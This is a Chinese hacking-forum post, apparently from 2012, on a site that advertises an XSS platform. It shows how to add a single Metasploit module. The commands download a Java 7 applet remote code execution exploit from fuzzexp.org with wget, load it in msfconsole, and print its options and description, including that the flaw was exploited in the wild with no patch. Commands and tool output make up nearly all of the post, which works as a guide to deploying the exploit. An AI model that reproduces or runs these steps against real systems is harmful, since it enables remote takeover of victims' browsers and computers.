切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
264 单个METASPLOIT文件使用[复制链接]
发表于 2012-9-12 00:18:30 | 显示全部楼层 |!read_mode!
例如:Java 7 Applet Remote Code Execution (Msf)
  1. root@Dis9Team:/# cd /root/.msf4/modules/
  2. root@Dis9Team:~/.msf4/modules# mkdir exploits
  3. root@Dis9Team:~/.msf4/modules# cd exploits/
  4. root@Dis9Team:~/.msf4/modules/exploits# mkdir windows/
  5. root@Dis9Team:~/.msf4/modules/exploits# cd windows/
  6. root@Dis9Team:~/.msf4/modules/exploits/windows# mkdir browser
  7. root@Dis9Team:~/.msf4/modules/exploits/windows# cd browser/
  8. root@Dis9Team:~/.msf4/modules/exploits/windows/browser# wget http://fuzzexp.org/exp/download.php?id=151 -O java_exec.rb
复制代码
启动MSF 进入模块
  1. root@Dis9Team:~/.msf4/modules/exploits/windows/browser# msfconsole
  2. msf > use exploit/windows/browser/java_exec
  3. msf  exploit(java_exec) > info

  4.        Name: Java 7 Applet Remote Code Execution
  5.      Module: exploit/windows/browser/java_exec
  6.     Version: 0
  7.    Platform: Java, Windows, Linux
  8. Privileged: No
  9.     License: Metasploit Framework License (BSD)
  10.        Rank: Excellent

  11. Provided by:
  12.   Unknown
  13.   jduck <jduck@metasploit.com>
  14.   sinn3r <sinn3r@metasploit.com>
  15.   juan vazquez <juan.vazquez@metasploit.com>

  16. Available targets:
  17.   Id  Name
  18.   --  ----
  19.   0   Generic (Java Payload)
  20.   1   Windows Universal
  21.   2   Linux x86

  22. Basic options:
  23.   Name        Current Setting  Required  Description
  24.   ----        ---------------  --------  -----------
  25.   SRVHOST     5.5.5.4          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  26.   SRVPORT     8080             yes       The local port to listen on.
  27.   SSL         false            no        Negotiate SSL for incoming connections
  28.   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
  29.   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
  30.   URIPATH                      no        The URI to use for this exploit (default is random)

  31. Payload information:
  32.   Space: 20480
  33.   Avoid: 0 characters

  34. Description:
  35.   This module exploits a vulnerability in Java 7, which allows an
  36.   attacker to run arbitrary Java code outside the sandbox. This flaw
  37.   is also being exploited in the wild, and there is no patch from
  38.   Oracle at this point. The exploit has been tested to work against:
  39.   IE, Chrome and Firefox across different platforms.

  40. References:

  41. http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html


  42. http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html

  43. msf  exploit(java_exec) >
复制代码



操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-28 09:51

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部